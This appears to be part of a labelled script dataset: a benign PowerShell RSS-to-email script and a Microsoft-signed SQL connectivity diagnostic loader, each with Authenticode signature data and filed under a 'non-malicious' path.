ve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viS # kR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYr # bqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlM # jgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSL # W6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AF # emzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIu # rQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIE # FgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWn # G1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEW # M2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5 # Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBi # AEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV # 9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3Js # Lm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAx # MC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2 # LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv # 6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZn # OlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1 # bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4 # rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU # 6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDF # NLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/ # HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdU # CbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKi # excdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTm # dHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZq # ELQdVTNYs6FwZvKhggNNMIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJp # Y2EgT3BlcmF0aW9uczEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOkRDMDAtMDVF # MC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMK # AQEwBwYFKw4DAhoDFQCMJG4vg0juMOVn2BuKACUvP80FuqCBgzCBgKR+MHwxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jv # c29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6smdRzAi # GA8yMDI0MTAyODA1MTkwM1oYDzIwMjQxMDI5MDUxOTAzWjB0MDoGCisGAQQBhFkK # BAExLDAqMAoCBQDqyZ1HAgEAMAcCAQACAh8PMAcCAQACAhQSMAoCBQDqyu7HAgEA # MDYGCisGAQQBhFkKBAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAI # AgEAAgMBhqAwDQYJKoZIhvcNAQELBQADggEBAMgszoIDg2o9tGcYXJy12HtzVNFW # M2U6+uXp/lZFN9GfKyEAtrE+WzK6IRGIcVwMQ88Li4P2eAY/JRqLae0FqcCpM7fV # KJCew6OG7JkRgr5zDklXZmeDXlSCV3g/wV51WFpAIuTVjd9LCV+YKpMLsnI+0mnr # KlnQGDVkrOH7GF9HYG+2JKF6eLr7JTYAwZCTpXYkfuWY4z3EKTTola7G9slIo7n5 # dTdvC9qaCYqt+eSrC5+s3smEjVTxn6EEPDjDmnaAJfLiZAsBGo6VEBm6tEV77qnm # V9xpIrErypW2LN6/e4lrLQJO3X5elf7PvUwi0ogdjF4wv5DRTrY4TQMJ+oMxggQN # MIIECQIBATCBkzB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQ # MA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u # MSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAehQ # sIDPK3KZTQABAAAB6DANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0G # CyqGSIb3DQEJEAEEMC8GCSqGSIb3DQEJBDEiBCAJeoUXxIVF/FZLlXRFVyrZO3/I # J7a2oVUZEszquqpJPjCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EICrS2sTV # AoQggkHR59pNqige0xfJT2J3U8W1Sc8H+OsdMIGYMIGApH4wfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTACEzMAAAHoULCAzytymU0AAQAAAegwIgQgLUsjW5We # q4WPeaZKqGRCLipnTqgXs5A+dsy2nUeh3x4wDQYJKoZIhvcNAQELBQAEggIAqXlK # N+6cyPt0zFCuofrP5mlHwdfNY1wAJFLj+OwVjkn8iZBj9LfLryCQBLcyhN+98p8U # v++GpdVM7mOpd8NhRBzDrnqXwicxg0V7mN1rMt8imcdmlK9FAH/GZyCnFVWL+z3+ # SK40P3ySt5J64Z1InzAwWkjl4wznniAYKDdSMbWeVm8WCu+j/DBnrxk7oEXQuG6p # Sht6q9yOxXaxo4eC7HhGD/WI8E+z0eqC0QHXTfnCJivP8i6O3PrrtD8XENturjsb # pk+rDCb2pSlKoS0+L8PjBfyIXbeO3FOOZad1CFsGHWLeuwvrjYwo0dQur38VOtsb # DsFd34t+rWZzNdSfio88NRc5Mgqq11nQ99Wnoq6/8lYHduVhDY+AFz9Wk2cAVhn8 # m2/avMN5r0vJhabgtx+HX+d/TzzRj/RD8bJ0iYMGSoeWRmiWfASwggqNwYbPQMlu # uMFxowWvIXdAZ22+nEV9eEt4T1v07t5dkZmCalrFZc863vi4QDsX4VaEbhAL/A6U # S4fTeze1ssnox1rRkJTpH7owx8RUWkHJ5FbNuDSFrEHDl1D4IaaqPItqZ1pclDNv # LCNXBj+9tCzRzsWo9l+rJGkNmxKCKx/MpuhdKspauuK1SYqhbRQvPYZpZ+QS71aM # D7ymuQAn9mlVAIxknY1AdoKPMDfPDhAxoMsPk7A= # SIG # End signature block
combined_dataset/train/non-malicious/rss2email.ps1
rss2email.ps1
# --------------------------------------------------------------------------- ### <Script> ### <Author> ### Chad Miller ### </Author> ### <Description> ### Checks an RSS feed and sends the feed information through email if it hasn't ### been seen before. ### </Description> ### <Usage> ### ./rss2email.ps1 'mailrelay.acme.com' "$ProfileDir\\guidcache.txt" "myemail@acme.com" "http://rss.cnn.com/rss/cnn_topstories.rss/ ### </Usage> ### </Script> # --------------------------------------------------------------------------- param ($smtpServer, $rssCacheFile, $recipients, $rssUrl) ####################### function Get-MD5 { param ($str) $cryptoServiceProvider = [System.Security.Cryptography.MD5CryptoServiceProvider] $hashAlgorithm = new-object $cryptoServiceProvider $byteArray = [Text.Encoding]::UTF8.GetBytes($str) $hashByteArray = $hashAlgorithm.ComputeHash($byteArray) $hex = $null $hashByteArray | foreach {$hex += $_.ToString("X2")} $hex } #Get-MD5 ####################### function Get-Rss { $feed = [xml](new-object System.Net.WebClient).DownloadString($rssUrl) #Set the description to the empty string, since it contains html markup $feed.rss.channel.Item | foreach {$_.description = ""} #Convert the rss.channel item to a string $results = $feed.rss.channel.Item | Out-String $title = $feed.rss.channel.title #if guid available we could do something like $feed.rss.GetElementsByTagName("guid") | % {$_.get_InnerXml()} #however some rss feeds don't have guids so we'll generate hex hash to uniquely identify the rss feed #return a hash table with array @{$(Get-MD5 $results) = @($title,$results)} } #Get-Rss ####################### function Send-RssEmail { param ($recipients,$subject,$message) $smtpmail = [System.Net.Mail.SMTPClient]("$smtpServer") $smtpmail.Send($recipients, $recipients, $subject, $message) } #Send-RssEmail ####################### function Get-RssCache { if (test-path $rssCacheFile) { $guidcache = Get-Content $rssCacheFile } else { $guidcache = @() } return $guidcache } #Get-RssCache ####################### $rss = $(Get-Rss $rssUrl) $guidcache = $(Get-RssCache) #If we haven't read seen this rss feed, send an email then add the feed MD5 hash to our cache file so we won't send it again if (!($guidcache -contains $rss.keys)) { Send-RssEmail $recipients $($rss.values)[0] $($rss.values)[1] $rss.keys >> $rssCacheFile }
combined_dataset/train/non-malicious/sample_19_91.ps1
sample_19_91.ps1
if (!$Global:SQL:SqlConnConfigFile) { #_# avoid errors when running report a second time in same PS session # SQL Connectivity configuration file New-Variable SQL:SqlConnConfigFile -Value 'App.config' -Option ReadOnly -Scope 'Global' # SQL Connectivity Global XML DOM Object - containing configuration info from App.config file New-Variable SQL:SqlConnConfigurations -Scope 'Global' } # ## Load Common Library: . ./utils_cts.ps1 . ./utils_DSD.ps1 #_#. ./utils_kerb.ps1 #_#. ./Sql_Network_Utils.ps1 #_#. ./AS_Utils.ps1 trap [Exception]{ WriteTo-StdOut "$($_.InvocationInfo.ScriptName)($($_.InvocationInfo.ScriptLineNumber)): $_" -shortformat; continue Write-Host "$($_.InvocationInfo.ScriptName)($($_.InvocationInfo.ScriptLineNumber)): $_" } # Function : Initialize-SqlConnConfigurations # -------------------------------------- # PowerShell Version: Written to be compatible with PowerShell 1.0 # Visibility: Private : Do Not Call this function from your PowerShell script # Description: This function will load the configuration entries from App.config file into a Global XML Document object, SQL:SqlConnConfigurations. # Different scripts can then access the info as a property of XML document object # Arguments: None # Returns: Nothing # Owner: muddin # Revision History: 1.0 02/05/2013 muddin # Original Version # function Initialize-SqlConnConfigurations(){ trap { '[Initialize-SqlConnConfigurations] : [ERROR] Trapped exception ...' | WriteTo-Stdout '[Initialize-SqlConnConfigurations] : [ERROR] Failed to retrieve SQL Connectivity configuration elements from XML config file' | WriteTo-StdOut Report-Error } '[Initialize-SqlConnConfigurations] : Inside the function ...' | WriteTo-Stdout $SqlConnConfigFileFullPath = Join-Path -Path $PWD -ChildPath $global:SQL:SqlConnConfigFile # Read SQL Connectivity configuration settings from the XML config file if ($true -eq (Test-Path -Path $SqlConnConfigFileFullPath -PathType Leaf)){ '[Initialize-SqlConnConfigurations] : Test-Path successful ...' | WriteTo-Stdout # initialize the xml object $global:SQL:SqlConnConfigurations = New-Object XML # load the config file as an xml object $global:SQL:SqlConnConfigurations.Load($SqlConnConfigFileFullPath) '[Initialize-SqlConnConfigurations] : XML config file load successful ...' | WriteTo-Stdout }else{ '[Initialize-SqlConnConfigurations] : [ERROR] The XML configuration file [{0}] was not found in it''s expected location [{1}]' -f $global:SQL:SqlConnConfigFile, $PWD | WriteTo-StdOut Report-Error } } # ## Load Application configuration file ## Action: ## ~~~~~~~ ## Loading App.Config file ## ## Description: ## ~~~~~~~~~~~~ ## App.config file contains configurable values like hard code strings, registry entries etc. ## ## Collected Files: ## ~~~~~~~~~~~~~~~~ ## None ## ## Log Message: ## ~~~~~~~~~~~~ "[Running Action] : Loading App.Config file `n" | WriteTo-Stdout ##-------------------------------------------------------------------- Initialize-SqlConnConfigurations $FirstTimeExecution = FirstTimeExecution if ($FirstTimeExecution) { # Auto Added Commands .\TS_AutoAddCommands_SQLconn.ps1 EndDataCollection } else { #2nd execution. Delete the temporary flag file then exit EndDataCollection -DeleteFlagFile $True } # SIG # Begin signature block # MIIoVAYJKoZIhvcNAQcCoIIoRTCCKEECAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCA/6qGR6R/W2nvh # mh77lvymAusRt6Y0hztgLkKQsg8uLaCCDYUwggYDMIID66ADAgECAhMzAAAEA73V # lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV # LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY # oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi # kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/ # /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv # ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r # EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV # NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC # rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos # oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB # +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO # raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+ # sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W # +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s # IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu # iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGiUwghohAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA # BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIDF1 # XKzja2v9L9TKzrbUgh5htXCS5dD0PxcjjO5Uh+ppMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAfI6MCKVfaZUi8CKseoOzMDwdOK7ywXqchB9I # vnAjUfmKaKDZpmeoMWAyE+/BItbzQ6sz8KbOcok9suy16hhrRlz4nM5MA028YB3v # 7TbfM/dimYzg+fKM6ra6pnZ0OMf1W/Ewj0pDeD9vooeBFddYrHW5BlPAngoOXeAF # nwDOiQdutZzK1C5ao+7YMqsK7F5zJy/1EYdD6YCltRy8TBY1x3FmiAL4TSaM7iF+ # CBVFihZQ4eCA/O1pIABp/M6waZ23D2V4GDbbmtDLi7HKtbHqU6GqH++ANMVeLr9p # xJJR+D9ktjtfhTDhDXuierqU7Kp8C1SboKlTLT02KwBD30gUWaGCF68wgherBgor # BgEEAYI3AwMBMYIXmzCCF5cGCSqGSIb3DQEHAqCCF4gwgheEAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFZBgsqhkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCC5Ll5zQF5FPupp11CSIr0Mjl8TwniSDpjm # XksDrxLdaQIGZutC6/RMGBIyMDI0MTAyODExNDAzOC44NVowBIACAfSggdmkgdYw # gdMxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS # ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsT # JE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMe # blNoaWVsZCBUU1MgRVNOOjQwMUEtMDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3Nv # ZnQgVGltZS1TdGFtcCBTZXJ2aWNloIIR/jCCBygwggUQoAMCAQICEzMAAAH+0KjC # ezQhCwEAAQAAAf4wDQYJKoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAg # UENBIDIwMTAwHhcNMjQwNzI1MTgzMTE4WhcNMjUxMDIyMTgzMTE4WjCB0zELMAkG # A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQx # HjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9z # b2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMScwJQYDVQQLEx5uU2hpZWxk # IFRTUyBFU046NDAxQS0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l # LVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQC8 # vCEXFaWoDjeiWwTg8J6BniZJ+wfZhNIoRi/wafffrYGZrJx1/lPe1DGk/c1abrZg # dSJ4hBfD7S7iqVrLgA3ciicj7js2mL1+jnbF0BcxfSkatzR6pbxFY3dt/Nc8q/Ts # 7XyLYeMPIu7LBjIoD0WZZt4+NqF/0zB3xCDKCQ+3AOtVAYvI6TIzdVOIcqqEa70E # IZVF0db2WY8yutSU9aJhX0tUIHlVh34ARS11+oB2qXNXEDncSDFKqGnolt8QqdN1 # x8/pPwyKvQevBNO1XaHbIMG2NdtAhqrJwo5vrfcZ9GSfbXos4MGDfs//HCGh1dPz # VkLZoc3t7EQOaZuJayyMa8UmSWLaDp23TV5KE6IaaFuievSpddwF6o1vpCgXyNf+ # 4NW1j2m8viPxoRZLj2EpQfSbOwK5wivBRL7Hwy5PS5/tVcIU0VuIJQ1FOh/EncHj # nh4YmEvR/BRNFuDIJukuAowoOIJG5vrkOFp4O9QAAlP3cpIKh4UKiSU9q9uBDJqE # ZkMv+9YBWNflvwnOGXL2AYJ0r+qLqL5zFnRLzHoHbKM9tl90FV8f80Gn/UufvFt4 # 4RMA6fs5P0PdQa3Sr4qJaBjjYecuPKGXVsC7kd+CvIA7cMJoh1Xa2O+QlrLao6cX # sOCPxrrQpBP1CB8l/BeevdkqJtgyNpRsI0gOfHPbKQIDAQABo4IBSTCCAUUwHQYD # VR0OBBYEFG/Oe4n1JTaDmX/n9v7kIGJtscXdMB8GA1UdIwQYMBaAFJ+nFV0AXmJd # g/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9z # b2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0El # MjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6 # Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGlt # ZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0l # AQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUA # A4ICAQCJPg1S87aXD7R0My2wG7GZfajeVVCqdCS4hMAYgYKAj6yXtmpk5MN3wurG # wfgZYI9PO1ze2vwCAG+xgjNaMXCKgKMJA4OrWgExY3MSwrNyQfEDNijlLN7s4+Qw # DcMDFWrhJJHzL5NELYZw53QlF5nWU+WGU+X1cj7Pw6C04+ZCcsuI/2rOlMfAXN76 # xupKfxx6R24xl0vIcmTc2LDcCeCVT9ZPMaxAB1yH1JVXgseJ9SebBN/SLTuIq1OU # 2SrdvHWLJaDs3uMZkAFFZPaZf5gBUeUrbu32f5a1hufpw4k1fouwfzE9UFFgAhFW # RawzIQB2g/12p9pnPBcaaO5VD3fU2HMeOMb4R/DXXwNeOTdWrepQjWt7fjMwxNHN # lkTDzYW6kXe+Jc1HcNU6VL0kfjHl6Z8g1rW65JpzoXgJ4kIPUZqR9LsPlrI2xpnZ # 